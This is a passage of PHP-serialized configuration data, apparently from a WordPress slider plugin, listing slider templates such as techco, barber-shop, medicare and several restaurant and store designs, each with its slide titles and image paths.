1\";s:3:\"img\";s:25:\"goodnewsfooter/slide1.jpg\";}}s:16:\"goodnewsmenuback\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"goodnewsmenuback/slide1.jpg\";}}s:18:\"goodnewsblogheader\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"goodnewsblogheader/slide1.jpg\";}}s:19:\"goodnewsblogcontent\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"goodnewsblogcontent/slide1.jpg\";}}s:20:\"goodnewstestimonials\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"goodnewstestimonials/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"goodnewstestimonials/slide2.jpg\";}}s:18:\"goodnewsblogfooter\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"goodnewsblogfooter/slide1.jpg\";}}s:17:\"beforeafterslider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"beforeafterslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"beforeafterslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"beforeafterslider/slide3.jpg\";}}s:15:\"productshowcase\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"productshowcase/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"productshowcase/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"productshowcase/slide3.jpg\";}}s:22:\"overexposuretransition\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"overexposuretransition/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"overexposuretransition/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"overexposuretransition/slide3.jpg\";}}s:14:\"parallaxscroll\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"parallaxscroll/slide1.jpg\";}}s:11:\"techco-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"techco-menu/slide1.jpg\";}}s:13:\"techco-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"techco-header/slide1.jpg\";}}s:12:\"techco-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"techco-about/slide1.jpg\";}}s:15:\"techco-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"techco-services/slide1.jpg\";}}s:12:\"techco-video\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"techco-video/slide1.jpg\";}}s:13:\"techco-prices\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"techco-prices/slide1.jpg\";}}s:19:\"techco-testimonials\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"techco-testimonials/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"techco-testimonials/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"techco-testimonials/slide3.jpg\";}}s:13:\"techco-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"techco-footer/slide1.jpg\";}}s:7:\"weather\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"weather/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"weather/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"weather/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:18:\"weather/slide4.jpg\";}}s:11:\"360panorama\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"360panorama/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"360panorama/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"360panorama/slide3.jpg\";}}s:14:\"duotone-add-on\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"duotone-add-on/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"duotone-add-on/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"duotone-add-on/slide3.jpg\";}}s:13:\"reveal-add-on\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"reveal-add-on/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"reveal-add-on/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"reveal-add-on/slide3.jpg\";}}s:16:\"band-tour-poster\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"smartcontent/band-tour-poster/slide1.png\";}}s:14:\"brewery-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"smartcontent/brewery-slider/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"smartcontent/brewery-slider/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"smartcontent/brewery-slider/slide3.png\";}}s:9:\"burgerbar\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"smartcontent/burgerbar/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"smartcontent/burgerbar/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"smartcontent/burgerbar/slide3.png\";}}s:19:\"burger-bar-portrait\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:43:\"smartcontent/burger-bar-portrait/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:43:\"smartcontent/burger-bar-portrait/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:43:\"smartcontent/burger-bar-portrait/slide3.png\";}}s:8:\"car-rent\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"smartcontent/car-rent/slide1.png\";}}s:6:\"coffee\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"smartcontent/coffee/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"smartcontent/coffee/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"smartcontent/coffee/slide3.png\";}}s:14:\"holiday-advert\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"smartcontent/holiday-advert/slide1.png\";}}s:18:\"iphone-cases-light\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:42:\"smartcontent/iphone-cases-light/slide1.png\";}}s:7:\"medical\";a:2:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"smartcontent/medical/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"smartcontent/medical/slide2.png\";}}s:13:\"mexican-grill\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"smartcontent/mexican-grill/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:37:\"smartcontent/mexican-grill/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:37:\"smartcontent/mexican-grill/slide3.png\";}}s:20:\"mobile-retail-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"smartcontent/mobile-retail-slider/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:44:\"smartcontent/mobile-retail-slider/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:44:\"smartcontent/mobile-retail-slider/slide3.png\";}}s:14:\"money-exchange\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"smartcontent/money-exchange/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"smartcontent/money-exchange/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"smartcontent/money-exchange/slide3.png\";}}s:28:\"restaurant-menu-first-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:52:\"smartcontent/restaurant-menu-first-screen/slide1.png\";}}s:29:\"restaurant-menu-second-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:53:\"smartcontent/restaurant-menu-second-screen/slide1.png\";}}s:28:\"restaurant-menu-third-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:52:\"smartcontent/restaurant-menu-third-screen/slide1.png\";}}s:11:\"shoes-store\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"smartcontent/shoes-store/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"smartcontent/shoes-store/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"smartcontent/shoes-store/slide3.png\";}}s:20:\"supermarket-products\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide1.png\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide2.png\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide3.png\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide4.png\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:44:\"smartcontent/supermarket-products/slide5.png\";}}s:16:\"travel-insurance\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:40:\"smartcontent/travel-insurance/slide1.png\";}}s:12:\"cryptoslider\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"cryptoslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:23:\"cryptoslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:23:\"cryptoslider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:23:\"cryptoslider/slide4.jpg\";}}s:16:\"immersion_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"immersion_header/slide1.jpg\";}}s:19:\"immersion-mountains\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"immersion-mountains/slide1.jpg\";}}s:17:\"immersion-product\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"immersion-product/slide1.jpg\";}}s:16:\"immersion-design\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"immersion-design/slide1.jpg\";}}s:21:\"immersion-photography\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"immersion-photography/slide1.jpg\";}}s:14:\"immersion-grid\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"immersion-grid/slide1.jpg\";}}s:11:\"funkyslider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"funkyslider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"funkyslider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"funkyslider/slide3.jpg\";}}s:14:\"clearview_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"clearview_menu/slide1.jpg\";}}s:16:\"clearview_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"clearview_header/slide1.jpg\";}}s:17:\"clearview_mission\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"clearview_mission/slide1.jpg\";}}s:17:\"clear-view-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"clear-view-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"clear-view-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"clear-view-slider/slide3.jpg\";}}s:15:\"clear-view-news\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"clear-view-news/slide1.jpg\";}}s:18:\"clear-view-clients\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"clear-view-clients/slide1.jpg\";}}s:18:\"clear-view-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"clear-view-contact/slide1.jpg\";}}s:22:\"clear-view-single-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"clear-view-single-menu/slide1.jpg\";}}s:24:\"clear-view-single-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"clear-view-single-header/slide1.jpg\";}}s:23:\"clear-view-single-media\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"clear-view-single-media/slide1.jpg\";}}s:22:\"clear-view-single-more\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"clear-view-single-more/slide1.jpg\";}}s:25:\"clear-view-single-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"clear-view-single-contact/slide1.jpg\";}}s:16:\"cleanlandingpage\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"cleanlandingpage/slide1.jpg\";}}s:8:\"clearcut\";a:10:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:19:\"clearcut/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:19:\"clearcut/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:19:\"clearcut/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:19:\"clearcut/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:19:\"clearcut/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:19:\"clearcut/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:19:\"clearcut/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:19:\"clearcut/slide8.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:19:\"clearcut/slide9.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:20:\"clearcut/slide10.jpg\";}}s:17:\"wonderstruck_menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"wonderstruck_menu/slide1.jpg\";}}s:19:\"wonderstruck_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"wonderstruck_header/slide1.jpg\";}}s:18:\"wonderstruck_about\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"wonderstruck_about/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"wonderstruck_about/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"wonderstruck_about/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"wonderstruck_about/slide4.jpg\";}}s:18:\"wonderstruck-works\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"wonderstruck-works/slide1.jpg\";}}s:20:\"wonderstruck-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"wonderstruck-contact/slide1.jpg\";}}s:11:\"bubblemorph\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"bubblemorph/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"bubblemorph/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"bubblemorph/slide3.jpg\";}}s:15:\"distortionaddon\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"distortionaddon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"distortionaddon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"distortionaddon/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"distortionaddon/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:26:\"distortionaddon/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:26:\"distortionaddon/slide6.jpg\";}}s:9:\"clubflyer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:20:\"clubflyer/slide1.jpg\";}}s:15:\"paintbrushaddon\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"paintbrushaddon/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"paintbrushaddon/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"paintbrushaddon/slide3.jpg\";}}s:15:\"parallax_header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"parallax_header/slide1.jpg\";}}s:16:\"parallax_content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"parallax_content/slide1.jpg\";}}s:15:\"parallax_footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"parallax_footer/slide1.jpg\";}}s:12:\"le-chef-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"le-chef-menu/slide1.jpg\";}}s:14:\"le-chef-header\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"le-chef-header/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"le-chef-header/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"le-chef-header/slide3.jpg\";}}s:18:\"le-chef-philosophy\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"le-chef-philosophy/slide1.jpg\";}}s:12:\"le-chef-food\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"le-chef-food/slide1.jpg\";}}s:16:\"le-chef-la-carte\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"le-chef-la-carte/slide1.jpg\";}}s:14:\"le-chef-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"le-chef-footer/slide1.jpg\";}}s:20:\"news-magazine-slider\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"news-magazine-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"news-magazine-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"news-magazine-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"news-magazine-slider/slide4.jpg\";}}s:18:\"real-estate-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"real-estate-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"real-estate-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"real-estate-slider/slide3.jpg\";}}s:14:\"fashion-header\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"fashion-header/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"fashion-header/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"fashion-header/slide3.jpg\";}}s:13:\"seasonaloffer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"seasonaloffer/slide1.jpg\";}}s:18:\"barber-shop-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"barber-shop-header/slide1.jpg\";}}s:23:\"barber-shop-mobile-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"barber-shop-mobile-menu/slide1.jpg\";}}s:24:\"barber-shop-first-screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"barber-shop-first-screen/slide1.jpg\";}}s:17:\"barber-shop-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"barber-shop-about/slide1.jpg\";}}s:20:\"barber-shop-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"barber-shop-services/slide1.jpg\";}}s:19:\"barber-shop-barbers\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"barber-shop-barbers/slide1.jpg\";}}s:20:\"barber-shop-contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"barber-shop-contacts/slide1.jpg\";}}s:18:\"barber-shop-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"barber-shop-footer/slide1.jpg\";}}s:21:\"fitness-club-template\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"fitness-club-template/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"fitness-club-template/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"fitness-club-template/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"fitness-club-template/slide4.jpg\";}}s:13:\"soccer-school\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"soccer-school/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"soccer-school/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"soccer-school/slide3.jpg\";}}s:19:\"music-band-template\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"music-band-template/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:30:\"music-band-template/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:30:\"music-band-template/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:30:\"music-band-template/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:30:\"music-band-template/slide5.jpg\";}}s:15:\"restaurant-menu\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"restaurant-menu/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"restaurant-menu/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"restaurant-menu/slide3.jpg\";}}s:16:\"cinematic-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"cinematic-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"cinematic-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"cinematic-slider/slide3.jpg\";}}s:17:\"3d-parallax-cubes\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide3.jpg\";}}s:13:\"medicare-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"medicare-menu/slide1.jpg\";}}s:15:\"medicare-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"medicare-header/slide1.jpg\";}}s:14:\"medicare-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"medicare-about/slide1.jpg\";}}s:18:\"medicare-highlight\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"medicare-highlight/slide1.jpg\";}}s:17:\"medicare-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"medicare-services/slide1.jpg\";}}s:16:\"medicare-doctors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"medicare-doctors/slide1.jpg\";}}s:17:\"medicare-research\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"medicare-research/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"medicare-research/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"medicare-research/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"medicare-research/slide4.jpg\";}}s:18:\"medicare-whychoose\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 